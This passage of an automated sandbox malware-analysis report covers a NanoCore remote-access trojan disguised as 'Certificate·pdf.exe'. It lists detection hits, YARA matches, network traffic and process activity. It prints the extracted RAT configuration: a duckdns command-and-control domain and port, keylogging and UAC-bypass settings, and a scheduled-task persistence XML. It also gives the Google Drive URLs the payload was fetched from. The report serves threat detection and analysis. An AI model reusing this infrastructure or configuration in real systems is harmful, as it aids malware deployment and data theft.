/f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp", ProcessId: 3408, ProcessName: schtasks.exe

      Stealing of Sensitive Information

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

      Remote Access Functionality

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 1072, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 7fxcmft-olcmjfjxdk.duckdns.orgAvira URL Cloud: Label: malware
      Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "48e0e383-40c8-47b1-a4ea-d717ed94", "Group": "Default", "Domain1": "7fxcmft-olcmjfjxdk.duckdns.org", "Domain2": "", "Port": 3342, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "7fxcmft-olcmjfjxdk.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 7fxcmft-olcmjfjxdk.duckdns.orgVirustotal: Detection: 11%Perma Link
      Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
      Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 9%Perma Link
      Source: 7fxcmft-olcmjfjxdk.duckdns.orgVirustotal: Detection: 11%Perma Link
      Source: Certificate#U00b7pdf.exeReversingLabs: Detection: 31%
      Source: Certificate#U00b7pdf.exeVirustotal: Detection: 53%Perma Link
      Source: Yara matchFile source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR
      Source: Certificate#U00b7pdf.exeJoe Sandbox ML: detected
      Source: Certificate#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
      Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2
      Source: Certificate#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9

      Networking

      barindex
      Source: Malware configuration extractorURLs:
      Source: Malware configuration extractorURLs: 7fxcmft-olcmjfjxdk.duckdns.org
      Source: unknownDNS query: name: 7fxcmft-olcmjfjxdk.duckdns.org
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: 7fxcmft-olcmjfjxdk.duckdns.org
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
      Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000004.00000002.24013324789.000000000309B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000004.00000002.24023428377.0000000008BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mics
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://subca.ocsp-certum.com01
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://subca.ocsp-certum.com02
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://subca.ocsp-certum.com05
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
      Source: Certificate#U00b7pdf.exeString found in binary or memory: http://www.certum.pl/CPS0
      Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB2r
      Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/8
      Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3
      Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3P
      Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
      Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownHTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E
      Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_75d711f8-5

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

      System Summary

      barindex
      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 19854
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 19854Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess Stats: CPU usage > 6%
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_00404C7B0_2_00404C7B
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD2FA85_2_23BD2FA8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD23A05_2_23BD23A0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD86DD5_2_23BD86DD
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD931F5_2_23BD931F
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD92585_2_23BD9258
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BDAD685_2_23BDAD68
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD306F5_2_23BD306F
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23BD38505_2_23BD3850
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 8_2_011904B08_2_011904B0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 8_2_011909388_2_01190938
      Source: Certificate#U00b7pdf.exeStatic PE information: invalid certificate
      Source: Certificate#U00b7pdf.exe, 00000000.00000000.23297968907.00000000007CB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe
      Source: Certificate#U00b7pdf.exeBinary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe
      Source: Certificate#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
